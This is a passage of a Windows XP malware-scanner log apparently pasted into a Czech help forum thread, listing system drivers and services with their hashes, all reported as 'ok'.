06:01:47.0109 0592 Modem - ok
06:01:47.0156 0592 [ 4CB582831DBDE63CE43B45D771218374 ] Mouclass C:\WINDOWS\system32\DRIVERS\mouclass.sys
06:01:47.0156 0592 Mouclass - ok
06:01:47.0187 0592 [ BB269EBA740737AB749B214D568B6812 ] mouhid C:\WINDOWS\system32\DRIVERS\mouhid.sys
06:01:47.0187 0592 mouhid - ok
06:01:47.0265 0592 [ A80B9A0BAD1B73637DBCBBA7DF72D3FD ] MountMgr C:\WINDOWS\system32\drivers\MountMgr.sys
06:01:47.0281 0592 MountMgr - ok
06:01:47.0312 0592 [ C0F8E0C2C3C0437CF37C6781896DC3EC ] MPE C:\WINDOWS\system32\DRIVERS\MPE.sys
06:01:47.0312 0592 MPE - ok
06:01:47.0375 0592 [ 3F4BB95E5A44F3BE34824E8E7CAF0737 ] mraid35x C:\WINDOWS\system32\DRIVERS\mraid35x.sys
06:01:47.0390 0592 mraid35x - ok
06:01:47.0437 0592 [ 11D42BB6206F33FBB3BA0288D3EF81BD ] MRxDAV C:\WINDOWS\system32\DRIVERS\mrxdav.sys
06:01:47.0453 0592 MRxDAV - ok
06:01:47.0515 0592 [ 7D304A5EB4344EBEEAB53A2FE3FFB9F0 ] MRxSmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
06:01:47.0515 0592 MRxSmb - ok
06:01:47.0578 0592 [ 6DB4D1521CABA9A5FFAB54ADE0AE867D ] MSDTC C:\WINDOWS\system32\msdtc.exe
06:01:47.0578 0592 MSDTC - ok
06:01:47.0625 0592 [ C941EA2454BA8350021D774DAF0F1027 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
06:01:47.0625 0592 Msfs - ok
06:01:47.0640 0592 [ 95C6432151CCFF8617352F8E616A1AA4 ] MSIRCOMM C:\WINDOWS\system32\DRIVERS\MSIRCOMM.sys
06:01:47.0640 0592 MSIRCOMM - ok
06:01:47.0656 0592 MSIServer - ok
06:01:47.0703 0592 [ D1575E71568F4D9E14CA56B7B0453BF1 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
06:01:47.0703 0592 MSKSSRV - ok
06:01:47.0750 0592 [ 325BB26842FC7CCC1FCCE2C457317F3E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
06:01:47.0750 0592 MSPCLOCK - ok
06:01:47.0796 0592 [ BAD59648BA099DA4A17680B39730CB3D ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
06:01:47.0796 0592 MSPQM - ok
06:01:47.0812 0592 [ AF5F4F3F14A8EA2C26DE30F7A1E17136 ] mssmbios C:\WINDOWS\system32\DRIVERS\mssmbios.sys
06:01:47.0812 0592 mssmbios - ok
06:01:47.0875 0592 [ E53736A9E30C45FA9E7B5EAC55056D1D ] MSTEE C:\WINDOWS\system32\drivers\MSTEE.sys
06:01:47.0875 0592 MSTEE - ok
06:01:47.0921 0592 [ DE6A75F5C270E756C5508D94B6CF68F5 ] Mup C:\WINDOWS\system32\drivers\Mup.sys
06:01:47.0921 0592 Mup - ok
06:01:47.0984 0592 [ 5B50F1B2A2ED47D560577B221DA734DB ] NABTSFEC C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys
06:01:47.0984 0592 NABTSFEC - ok
06:01:48.0031 0592 [ 6EA362E9DB03D44F6B996F4D8BE237E9 ] napagent C:\WINDOWS\System32\qagentrt.dll
06:01:48.0031 0592 napagent - ok
06:01:48.0093 0592 [ 1DF7F42665C94B825322FAE71721130D ] NDIS C:\WINDOWS\system32\drivers\NDIS.sys
06:01:48.0109 0592 NDIS - ok
06:01:48.0156 0592 [ 7FF1F1FD8609C149AA432F95A8163D97 ] NdisIP C:\WINDOWS\system32\DRIVERS\NdisIP.sys
06:01:48.0156 0592 NdisIP - ok
06:01:48.0203 0592 [ 0109C4F3850DFBAB279542515386AE22 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
06:01:48.0203 0592 NdisTapi - ok
06:01:48.0281 0592 [ F927A4434C5028758A842943EF1A3849 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
06:01:48.0281 0592 Ndisuio - ok
06:01:48.0312 0592 [ EDC1531A49C80614B2CFDA43CA8659AB ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
06:01:48.0312 0592 NdisWan - ok
06:01:48.0375 0592 [ 9282BD12DFB069D3889EB3FCC1000A9B ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
06:01:48.0375 0592 NDProxy - ok
06:01:48.0406 0592 [ 5D81CF9A2F1A3A756B66CF684911CDF0 ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
06:01:48.0406 0592 NetBIOS - ok
06:01:48.0453 0592 [ 74B2B2F5BEA5E9A3DC021D685551BD3D ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
06:01:48.0453 0592 NetBT - ok
06:01:48.0515 0592 [ 933DE774986EC85E48210C44AB431DE6 ] NetDDE C:\WINDOWS\system32\netdde.exe
06:01:48.0515 0592 NetDDE - ok
06:01:48.0546 0592 [ 933DE774986EC85E48210C44AB431DE6 ] NetDDEdsdm C:\WINDOWS\system32\netdde.exe
06:01:48.0546 0592 NetDDEdsdm - ok
06:01:48.0609 0592 [ ED0A176354487CEED65B80A7148AB739 ] Netlogon C:\WINDOWS\system32\lsass.exe
06:01:48.0609 0592 Netlogon - ok
06:01:48.0656 0592 [ 72E1E9E2977BE08BDEEDB6D8FD9D4D40 ] Netman C:\WINDOWS\System32\netman.dll
06:01:48.0656 0592 Netman - ok
06:01:48.0718 0592 [ D34612C5D02D026535B3095D620626AE ] NetTcpPortSharing c:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
06:01:48.0718 0592 NetTcpPortSharing - ok
06:01:48.0765 0592 [ E9E47CFB2D461FA0FC75B7A74C6383EA ] NIC1394 C:\WINDOWS\system32\DRIVERS\nic1394.sys
06:01:48.0765 0592 NIC1394 - ok
06:01:48.0828 0592 [ 39EE7C3BFBC64BA87CC8CF67386E814C ] Nla C:\WINDOWS\System32\mswsock.dll
06:01:48.0828 0592 Nla - ok
06:01:48.0921 0592 nosGetPlusHelper - ok
06:01:48.0968 0592 [ 3182D64AE053D6FB034F44B6DEF8034A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
06:01:48.0984 0592 Npfs - ok
06:01:49.0031 0592 [ 2ADC0CA9945C65284B3D19BC18765974 ] NSCIRDA C:\WINDOWS\system32\DRIVERS\nscirda.sys
06:01:49.0031 0592 NSCIRDA - ok
06:01:49.0093 0592 [ 78A08DD6A8D65E697C18E1DB01C5CDCA ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
06:01:49.0109 0592 Ntfs - ok
06:01:49.0156 0592 [ 7F1C1F78D709C4A54CBB46EDE7E0B48D ] NTIDrvr C:\WINDOWS\system32\DRIVERS\NTIDrvr.sys
06:01:49.0156 0592 NTIDrvr - ok
06:01:49.0187 0592 [ ED0A176354487CEED65B80A7148AB739 ] NtLmSsp C:\WINDOWS\system32\lsass.exe
06:01:49.0187 0592 NtLmSsp - ok
06:01:49.0265 0592 [ 023DD70573D644F3D9C8B1258A7BFD08 ] NtmsSvc C:\WINDOWS\system32\ntmssvc.dll
06:01:49.0265 0592 NtmsSvc - ok
06:01:49.0328 0592 [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null C:\WINDOWS\system32\drivers\Null.sys
06:01:49.0328 0592 Null - ok
06:01:49.0375 0592 [ ADB82FBC435AE7504082B3C714C3885D ] NWCWorkstation C:\WINDOWS\System32\nwwks.dll
06:01:49.0375 0592 NWCWorkstation - ok
06:01:49.0437 0592 [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
06:01:49.0437 0592 NwlnkFlt - ok
06:01:49.0468 0592 [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
06:01:49.0468 0592 NwlnkFwd - ok
06:01:49.0515 0592 [ 8B8B1BE2DBA4025DA6786C645F77F123 ] NwlnkIpx C:\WINDOWS\system32\DRIVERS\nwlnkipx.sys
06:01:49.0515 0592 NwlnkIpx - ok
06:01:49.0562 0592 [ 56D34A67C05E94E16377C60609741FF8 ] NwlnkNb C:\WINDOWS\system32\DRIVERS\nwlnknb.sys
06:01:49.0562 0592 NwlnkNb - ok
06:01:49.0640 0592 [ C0BB7D1615E1ACBDC99757F6CEAF8CF0 ] NwlnkSpx C:\WINDOWS\system32\DRIVERS\nwlnkspx.sys
06:01:49.0640 0592 NwlnkSpx - ok
06:01:49.0703 0592 [ 36B9B950E3D2E100970A48D8BAD86740 ] NWRDR C:\WINDOWS\system32\DRIVERS\nwrdr.sys
06:01:49.0703 0592 NWRDR - ok
06:01:49.0734 0592 [ CA33832DF41AFB202EE7AEB05145922F ] ohci1394 C:\WINDOWS\system32\DRIVERS\ohci1394.sys
06:01:49.0734 0592 ohci1394 - ok
06:01:49.0796 0592 [ 46F8DB73B4A53E543F8E371DC7C75BAE ] Parport C:\WINDOWS\system32\DRIVERS\parport.sys
06:01:49.0796 0592 Parport - ok
06:01:49.0859 0592 [ BEB3BA25197665D82EC7065B724171C6 ] PartMgr C:\WINDOWS\system32\drivers\PartMgr.sys
06:01:49.0859 0592 PartMgr - ok
06:01:49.0906 0592 [ 1FAE19D0457176318BBA4A8795656EBC ] ParVdm C:\WINDOWS\system32\drivers\ParVdm.sys
06:01:49.0906 0592 ParVdm - ok
06:01:49.0953 0592 [ 6CE351D149CB4BEFC702951E471E1730 ] PCI C:\WINDOWS\system32\DRIVERS\pci.sys
06:01:49.0953 0592 PCI - ok
06:01:49.0984 0592 PCIDump - ok
06:01:50.0015 0592 [ 2DA4EC85E0EA7A45C6B2A05820492D5A ] PCIIde C:\WINDOWS\system32\DRIVERS\pciide.sys
06:01:50.0015 0592 PCIIde - ok
06:01:50.0078 0592 [ 4FC31E6C19A5CE5198B1ABFF94CAE758 ] Pcmcia C:\WINDOWS\system32\DRIVERS\pcmcia.sys
06:01:50.0078 0592 Pcmcia - ok
06:01:50.0093 0592 PDCOMP - ok
06:01:50.0125 0592 PDFRAME - ok
06:01:50.0156 0592 PDRELI - ok
06:01:50.0171 0592 PDRFRAME - ok
06:01:50.0203 0592 [ 6C14B9C19BA84F73D3A86DBA11133101 ] perc2 C:\WINDOWS\system32\DRIVERS\perc2.sys
06:01:50.0203 0592 perc2 - ok
06:01:50.0234 0592 [ F50F7C27F131AFE7BEBA13E14A3B9416 ] perc2hib C:\WINDOWS\system32\DRIVERS\perc2hib.sys
06:01:50.0234 0592 perc2hib - ok
06:01:50.0343 0592 [ 9EF697AF07BB8DD82C3B02CA953A95B7 ] PlugPlay C:\WINDOWS\system32\services.exe
06:01:50.0343 0592 PlugPlay - ok
06:01:50.0375 0592 [ ED0A176354487CEED65B80A7148AB739 ] PolicyAgent C:\WINDOWS\system32\lsass.exe
06:01:50.0375 0592 PolicyAgent - ok
06:01:50.0437 0592 [ EFEEC01B1D3CF84F16DDD24D9D9D8F99 ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
06:01:50.0437 0592 PptpMiniport - ok
06:01:50.0468 0592 [ 7EB15DCE4EC3A0220BD796A15C18186E ] Processor C:\WINDOWS\system32\DRIVERS\processr.sys
06:01:50.0468 0592 Processor - ok
06:01:50.0500 0592 [ ED0A176354487CEED65B80A7148AB739 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
06:01:50.0500 0592 ProtectedStorage - ok
06:01:50.0531 0592 [ 09298EC810B07E5D582CB3A3F9255424 ] PSched C:\WINDOWS\system32\DRIVERS\psched.sys
06:01:50.0531 0592 PSched - ok
06:01:50.0562 0592 psdfilter - ok
06:01:50.0593 0592 psdvdisk - ok
06:01:50.0656 0592 [ 80D317BD1C3DBC5D4FE7B1678C60CADD ] Ptilink C:\WINDOWS\system32\DRIVERS\ptilink.sys
06:01:50.0656 0592 Ptilink - ok
06:01:50.0703 0592 [ E42E3433DBB4CFFE8FDD91EAB29AEA8E ] PxHelp20 C:\WINDOWS\system32\Drivers\PxHelp20.sys
06:01:50.0703 0592 PxHelp20 - ok
06:01:50.0734 0592 [ 0A63FB54039EB5662433CABA3B26DBA7 ] ql1080 C:\WINDOWS\system32\DRIVERS\ql1080.sys
06:01:50.0734 0592 ql1080 - ok
06:01:50.0765 0592 [ 6503449E1D43A0FF0201AD5CB1B8C706 ] Ql10wnt C:\WINDOWS\system32\DRIVERS\ql10wnt.sys
06:01:50.0765 0592 Ql10wnt - ok
06:01:50.0781 0592 [ 156ED0EF20C15114CA097A34A30D8A01 ] ql12160 C:\WINDOWS\system32\DRIVERS\ql12160.sys
06:01:50.0796 0592 ql12160 - ok
06:01:50.0828 0592 [ 70F016BEBDE6D29E864C1230A07CC5E6 ] ql1240 C:\WINDOWS\system32\DRIVERS\ql1240.sys
06:01:50.0828 0592 ql1240 - ok
06:01:50.0843 0592 [ 907F0AEEA6BC451011611E732BD31FCF ] ql1280 C:\WINDOWS\system32\DRIVERS\ql1280.sys
06:01:50.0859 0592 ql1280 - ok
06:01:50.0890 0592 [ FE0D99D6F31E4FAD8159F690D68DED9C ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
06:01:50.0890 0592 RasAcd - ok
06:01:50.0937 0592 [ 2B5E44EA009F2F374B980E1E9A70635D ] RasAuto C:\WINDOWS\System32\rasauto.dll
06:01:50.0953 0592 RasAuto - ok
06:01:51.0000 0592 [ 0207D26DDF796A193CCD9F83047BB5FC ] Rasirda C:\WINDOWS\system32\DRIVERS\rasirda.sys
06:01:51.0000 0592 Rasirda - ok
06:01:51.0015 0592 [ 11B4A627BC9614B885C4969BFA5FF8A6 ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
06:01:51.0015 0592 Rasl2tp - ok
06:01:51.0078 0592 [ D57554C664B64604BD1EE13EA2C07E77 ] RasMan C:\WINDOWS\System32\rasmans.dll
06:01:51.0093 0592 RasMan - ok
06:01:51.0140 0592 [ 5BC962F2654137C9909C3D4603587DEE ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
06:01:51.0140 0592 RasPppoe - ok
06:01:51.0187 0592 [ FDBB1D60066FCFBB7452FD8F9829B242 ] Raspti C:\WINDOWS\system32\DRIVERS\raspti.sys
06:01:51.0203 0592 Raspti - ok
06:01:51.0218 0592 [ 7AD224AD1A1437FE28D89CF22B17780A ] Rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
06:01:51.0234 0592 Rdbss - ok
06:01:51.0250 0592 [ 4912D5B403614CE99C28420F75353332 ] RDPCDD C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
06:01:51.0250 0592 RDPCDD - ok
06:01:51.0296 0592 [ 15CABD0F7C00C47C70124907916AF3F1 ] rdpdr C:\WINDOWS\system32\DRIVERS\rdpdr.sys
06:01:51.0312 0592 rdpdr - ok
06:01:51.0375 0592 [ 43AF5212BD8FB5BA6EED9754358BD8F7 ] RDPWD C:\WINDOWS\system32\drivers\RDPWD.sys
06:01:51.0375 0592 RDPWD - ok
06:01:51.0437 0592 [ C0D9D9711CB74EE9BC66353D8CBDAB0E ] RDSessMgr C:\WINDOWS\system32\sessmgr.exe
06:01:51.0437 0592 RDSessMgr - ok
06:01:51.0484 0592 [ 611BFD220305BE3A85AE876EA47D4AA5 ] redbook C:\WINDOWS\system32\DRIVERS\redbook.sys
06:01:51.0484 0592 redbook - ok
06:01:51.0546 0592 [ 127C26B5371651043450E52542099ABA ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
06:01:51.0546 0592 RemoteAccess - ok
06:01:51.0609 0592 [ 8F31505484A190D5B22274708799F4EC ] RemoteRegistry C:\WINDOWS\system32\regsvc.dll
06:01:51.0609 0592 RemoteRegistry - ok
06:01:51.0734 0592 [ 06A49B7BDC36CFBF97DD90804F833369 ] RichVideo C:\Program Files\CyberLink\Shared Files\RichVideo.exe
06:01:51.0734 0592 RichVideo - ok
06:01:51.0796 0592 [ 718B3BDC0BC3C2F7D065A53D26202AF9 ] RpcLocator C:\WINDOWS\system32\locator.exe
06:01:51.0796 0592 RpcLocator - ok
06:01:51.0875 0592 [ BE27674D1CBC3214AEC84B4336A38BBF ] RpcSs C:\WINDOWS\System32\rpcss.dll
06:01:51.0875 0592 RpcSs - ok
06:01:51.0953 0592 [ 09AB2E71E58B078038E3BFDBA7FFC984 ] RSVP C:\WINDOWS\system32\rsvp.exe
06:01:51.0953 0592 RSVP - ok
06:01:52.0000 0592 [ ED0A176354487CEED65B80A7148AB739 ] SamSs C:\WINDOWS\system32\lsass.exe
06:01:52.0000 0592 SamSs - ok
06:01:52.0046 0592 [ 410046E401EB11E1E6749E9DEEA41D4A ] SCardSvr C:\WINDOWS\System32\SCardSvr.exe
06:01:52.0062 0592 SCardSvr - ok
06:01:52.0109 0592 [ 3FF232A7731621B8902D81D42418C93C ] Schedule C:\WINDOWS\system32\schedsvc.dll
06:01:52.0109 0592 Schedule - ok
06:01:52.0203 0592 [ 8D04819A3CE51B9EB47E5689B44D43C4 ] sdbus C:\WINDOWS\system32\DRIVERS\sdbus.sys
06:01:52.0203 0592 sdbus - ok
06:01:52.0265 0592 [ 90A3935D05B494A5A39D37E71F09A677 ] Secdrv C:\WINDOWS\system32\DRIVERS\secdrv.sys
06:01:52.0265 0592 Secdrv - ok
06:01:52.0312 0592 [ 477E2C3CC5E4A0D635BCB0EA8DCAC3C6 ] seclogon C:\WINDOWS\System32\seclogon.dll
06:01:52.0312 0592 seclogon - ok
06:01:52.0359 0592 [ A530B75C10C23C9AB28FDB6CE719E21F ] SENS C:\WINDOWS\system32\sens.dll
06:01:52.0359 0592 SENS - ok
06:01:52.0421 0592 [ 0F29512CCD6BEAD730039FB4BD2C85CE ] Serenum C:\WINDOWS\system32\DRIVERS\serenum.sys
06:01:52.0421 0592 Serenum - ok
06:01:52.0453 0592 [ B842729337C9B921615C40D3C1A1AF96 ] Serial C:\WINDOWS\system32\DRIVERS\serial.sys
06:01:52.0453 0592 Serial - ok
06:01:52.0531 0592 [ 8E6B8C671615D126FDC553D1E2DE5562 ] Sfloppy C:\WINDOWS\system32\drivers\Sfloppy.sys
06:01:52.0546 0592 Sfloppy - ok
06:01:52.0625 0592 [ F58FACA9621D2DB01BD0927D9A0A208E ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
06:01:52.0625 0592 SharedAccess - ok
06:01:52.0687 0592 [ EE9A2B9EA968A792A053C9D1A86BF870 ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
06:01:52.0687 0592 ShellHWDetection - ok
06:01:52.0718 0592 Simbad - ok
06:01:52.0781 0592 [ 6B33D0EBD30DB32E27D1D78FE946A754 ] sisagp C:\WINDOWS\system32\DRIVERS\sisagp.sys
06:01:52.0781 0592 sisagp - ok

yeewf7 · Příspěvekod **yeewf7** » 29 srp 2012 08:49

06:01:52.0875 0592 [ EA396139541706B4B433641D62EA53CE ] SkypeUpdate C:\Program Files\Skype\Updater\Updater.exe
06:01:52.0875 0592 SkypeUpdate - ok
06:01:52.0921 0592 [ 866D538EBE33709A5C9F5C62B73B7D14 ] SLIP C:\WINDOWS\system32\DRIVERS\SLIP.sys
06:01:52.0921 0592 SLIP - ok
06:01:53.0000 0592 [ 14BB60A4F1C5291217A05D5728C403E6 ] SmartDefragDriver C:\WINDOWS\system32\Drivers\SmartDefragDriver.sys
06:01:53.0000 0592 SmartDefragDriver - ok
06:01:53.0062 0592 [ 83C0F71F86D3BDAF915685F3D568B20E ] Sparrow C:\WINDOWS\system32\DRIVERS\sparrow.sys
06:01:53.0062 0592 Sparrow - ok
06:01:53.0125 0592 [ AB8B92451ECB048A4D1DE7C3FFCB4A9F ] splitter C:\WINDOWS\system32\drivers\splitter.sys
06:01:53.0125 0592 splitter - ok
06:01:53.0187 0592 [ 60784F891563FB1B767F70117FC2428F ] Spooler C:\WINDOWS\system32\spoolsv.exe
06:01:53.0187 0592 Spooler - ok
06:01:53.0234 0592 [ 94610C8653635E4459316A0050D55CE7 ] sr C:\WINDOWS\system32\DRIVERS\sr.sys
06:01:53.0234 0592 sr - ok
06:01:53.0281 0592 [ 35B91147124F64AC8081A2EDB9EA4DEE ] srservice C:\WINDOWS\system32\srsvc.dll
06:01:53.0281 0592 srservice - ok
06:01:53.0359 0592 [ 47DDFC2F003F7F9F0592C6874962A2E7 ] Srv C:\WINDOWS\system32\DRIVERS\srv.sys
06:01:53.0359 0592 Srv - ok
06:01:53.0421 0592 [ BECD5271DC4E3B7C3D035F790FCBC1E5 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
06:01:53.0437 0592 SSDPSRV - ok
06:01:53.0500 0592 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\WINDOWS\system32\DRIVERS\ssmdrv.sys
06:01:53.0500 0592 ssmdrv - ok
06:01:53.0546 0592 [ C1CDD9275F6A115BB0AE1D55D8D27BA6 ] stisvc C:\WINDOWS\system32\wiaservc.dll
06:01:53.0546 0592 stisvc - ok
06:01:53.0593 0592 [ 77813007BA6265C4B6098187E6ED79D2 ] streamip C:\WINDOWS\system32\DRIVERS\StreamIP.sys
06:01:53.0593 0592 streamip - ok
06:01:53.0640 0592 [ 3941D127AEF12E93ADDF6FE6EE027E0F ] swenum C:\WINDOWS\system32\DRIVERS\swenum.sys
06:01:53.0640 0592 swenum - ok
06:01:53.0671 0592 [ 8CE882BCC6CF8A62F2B2323D95CB3D01 ] swmidi C:\WINDOWS\system32\drivers\swmidi.sys
06:01:53.0671 0592 swmidi - ok
06:01:53.0703 0592 SwPrv - ok
06:01:53.0781 0592 [ 1FF3217614018630D0A6758630FC698C ] symc810 C:\WINDOWS\system32\DRIVERS\symc810.sys
06:01:53.0781 0592 symc810 - ok
06:01:53.0812 0592 [ 070E001D95CF725186EF8B20335F933C ] symc8xx C:\WINDOWS\system32\DRIVERS\symc8xx.sys
06:01:53.0812 0592 symc8xx - ok
06:01:53.0843 0592 [ 80AC1C4ABBE2DF3B738BF15517A51F2C ] sym_hi C:\WINDOWS\system32\DRIVERS\sym_hi.sys
06:01:53.0843 0592 sym_hi - ok
06:01:53.0890 0592 [ BF4FAB949A382A8E105F46EBB4937058 ] sym_u3 C:\WINDOWS\system32\DRIVERS\sym_u3.sys
06:01:53.0890 0592 sym_u3 - ok
06:01:53.0937 0592 [ E295FFFFF3AAF9A6A40B29497901908F ] SynTP C:\WINDOWS\system32\DRIVERS\SynTP.sys
06:01:53.0937 0592 SynTP - ok
06:01:53.0968 0592 [ 8B83F3ED0F1688B4958F77CD6D2BF290 ] sysaudio C:\WINDOWS\system32\drivers\sysaudio.sys
06:01:53.0984 0592 sysaudio - ok
06:01:54.0031 0592 [ CE06F01B88ACE199A1BF460CAC29C110 ] SysmonLog C:\WINDOWS\system32\smlogsvc.exe
06:01:54.0031 0592 SysmonLog - ok
06:01:54.0078 0592 [ C2546CD7A398476F9DF5614B2AE160E8 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
06:01:54.0093 0592 TapiSrv - ok
06:01:54.0156 0592 [ 9AEFA14BD6B182D61E3119FA5F436D3D ] Tcpip C:\WINDOWS\system32\DRIVERS\tcpip.sys
06:01:54.0156 0592 Tcpip - ok
06:01:54.0203 0592 [ 6471A66807F5E104E4885F5B67349397 ] TDPIPE C:\WINDOWS\system32\drivers\TDPIPE.sys
06:01:54.0203 0592 TDPIPE - ok
06:01:54.0250 0592 [ C56B6D0402371CF3700EB322EF3AAF61 ] TDTCP C:\WINDOWS\system32\drivers\TDTCP.sys
06:01:54.0250 0592 TDTCP - ok
06:01:54.0296 0592 [ 88155247177638048422893737429D9E ] TermDD C:\WINDOWS\system32\DRIVERS\termdd.sys
06:01:54.0296 0592 TermDD - ok
06:01:54.0343 0592 [ A75DD6FC3DBEE4FFF5EBC9F2C28BB66E ] TermService C:\WINDOWS\System32\termsrv.dll
06:01:54.0359 0592 TermService - ok
06:01:54.0375 0592 [ EE9A2B9EA968A792A053C9D1A86BF870 ] Themes C:\WINDOWS\System32\shsvcs.dll
06:01:54.0390 0592 Themes - ok
06:01:54.0437 0592 [ 78213F01CE781F93180BEF5EB5B3AD81 ] tifm21 C:\WINDOWS\system32\drivers\tifm21.sys
06:01:54.0453 0592 tifm21 - ok
06:01:54.0500 0592 [ CD0CC7B167D78043A41C98D4921EFB54 ] TlntSvr C:\WINDOWS\system32\tlntsvr.exe
06:01:54.0515 0592 TlntSvr - ok
06:01:54.0546 0592 [ FD4FD7D6FDA5C019ED86025D7BE1510F ] TosIde C:\WINDOWS\system32\DRIVERS\toside.sys
06:01:54.0546 0592 TosIde - ok
06:01:54.0625 0592 [ 38853304CCB938D30E0C4CDE8D2C2A8A ] TrkWks C:\WINDOWS\system32\trkwks.dll
06:01:54.0625 0592 TrkWks - ok
06:01:54.0703 0592 [ 97DD70FECA64FB4F63DE7BB7E66A80B1 ] tvicport C:\WINDOWS\system32\drivers\tvicport.sys
06:01:54.0703 0592 tvicport - ok
06:01:54.0734 0592 [ E0C67BE430C6DE490D6CCAECFA071F9E ] UBHelper C:\WINDOWS\system32\drivers\UBHelper.sys
06:01:54.0750 0592 UBHelper - ok
06:01:54.0796 0592 [ 5787B80C2E3C5E2F56C2A233D91FA2C9 ] Udfs C:\WINDOWS\system32\drivers\Udfs.sys
06:01:54.0796 0592 Udfs - ok
06:01:54.0859 0592 [ 1B698A51CD528D8DA4FFAED66DFC51B9 ] ultra C:\WINDOWS\system32\DRIVERS\ultra.sys
06:01:54.0859 0592 ultra - ok
06:01:54.0921 0592 [ 402DDC88356B1BAC0EE3DD1580C76A31 ] Update C:\WINDOWS\system32\DRIVERS\update.sys
06:01:54.0921 0592 Update - ok
06:01:55.0000 0592 [ 651BD90DCEE5B7BDC74A2EB7C9266F9E ] upnphost C:\WINDOWS\System32\upnphost.dll
06:01:55.0000 0592 upnphost - ok
06:01:55.0031 0592 [ 20A0F6A11959E92908717D09E87D670D ] UPS C:\WINDOWS\System32\ups.exe
06:01:55.0031 0592 UPS - ok
06:01:55.0093 0592 [ 173F317CE0DB8E21322E71B7E60A27E8 ] usbccgp C:\WINDOWS\system32\DRIVERS\usbccgp.sys
06:01:55.0093 0592 usbccgp - ok
06:01:55.0125 0592 [ 65DCF09D0E37D4C6B11B5B0B76D470A7 ] usbehci C:\WINDOWS\system32\DRIVERS\usbehci.sys
06:01:55.0125 0592 usbehci - ok
06:01:55.0171 0592 [ 1AB3CDDE553B6E064D2E754EFE20285C ] usbhub C:\WINDOWS\system32\DRIVERS\usbhub.sys
06:01:55.0171 0592 usbhub - ok
06:01:55.0218 0592 [ A0B8CF9DEB1184FBDD20784A58FA75D4 ] usbscan C:\WINDOWS\system32\DRIVERS\usbscan.sys
06:01:55.0234 0592 usbscan - ok
06:01:55.0265 0592 [ A32426D9B14A089EAA1D922E0C5801A9 ] USBSTOR C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
06:01:55.0265 0592 USBSTOR - ok
06:01:55.0296 0592 [ 26496F9DEE2D787FC3E61AD54821FFE6 ] usbuhci C:\WINDOWS\system32\DRIVERS\usbuhci.sys
06:01:55.0296 0592 usbuhci - ok
06:01:55.0343 0592 [ 63BBFCA7F390F4C49ED4B96BFB1633E0 ] usbvideo C:\WINDOWS\system32\Drivers\usbvideo.sys
06:01:55.0343 0592 usbvideo - ok
06:01:55.0390 0592 [ 0D3A8FAFCEACD8B7625CD549757A7DF1 ] VgaSave C:\WINDOWS\System32\drivers\vga.sys
06:01:55.0390 0592 VgaSave - ok
06:01:55.0437 0592 [ 754292CE5848B3738281B4F3607EAEF4 ] viaagp C:\WINDOWS\system32\DRIVERS\viaagp.sys
06:01:55.0437 0592 viaagp - ok
06:01:55.0468 0592 [ 3B3EFCDA263B8AC14FDF9CBDD0791B2E ] ViaIde C:\WINDOWS\system32\DRIVERS\viaide.sys
06:01:55.0468 0592 ViaIde - ok
06:01:55.0531 0592 [ 28A4B296B47782173C346E376CB374D1 ] VolSnap C:\WINDOWS\system32\drivers\VolSnap.sys
06:01:55.0546 0592 VolSnap - ok
06:01:55.0609 0592 [ D6BA1A63D9E00933F1CD2A885573AFB2 ] VSS C:\WINDOWS\System32\vssvc.exe
06:01:55.0609 0592 VSS - ok
06:01:55.0640 0592 [ FA4E1CDBA256787F2149F4AAD07BC91F ] W32Time C:\WINDOWS\system32\w32time.dll
06:01:55.0656 0592 W32Time - ok
06:01:55.0703 0592 [ E20B95BAEDB550F32DD489265C1DA1F6 ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
06:01:55.0703 0592 Wanarp - ok
06:01:55.0734 0592 WDICA - ok
06:01:55.0781 0592 [ 6768ACF64B18196494413695F0C3A00F ] wdmaud C:\WINDOWS\system32\drivers\wdmaud.sys
06:01:55.0781 0592 wdmaud - ok
06:01:55.0828 0592 [ 47AE51048A82DFA1CD6B51D369F7E169 ] WebClient C:\WINDOWS\System32\webclnt.dll
06:01:55.0828 0592 WebClient - ok
06:01:55.0906 0592 [ 307D248F97835B6879BDD361086924FE ] winachsf C:\WINDOWS\system32\DRIVERS\HSF_CNXT.sys
06:01:55.0921 0592 winachsf - ok
06:01:56.0031 0592 [ E488332126E3B1182D2B8A0C35408EC6 ] winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
06:01:56.0031 0592 winmgmt - ok
06:01:56.0125 0592 [ C51B4A5C05A5475708E3C81C7765B71D ] WmdmPmSN C:\WINDOWS\system32\MsPMSNSv.dll
06:01:56.0140 0592 WmdmPmSN - ok
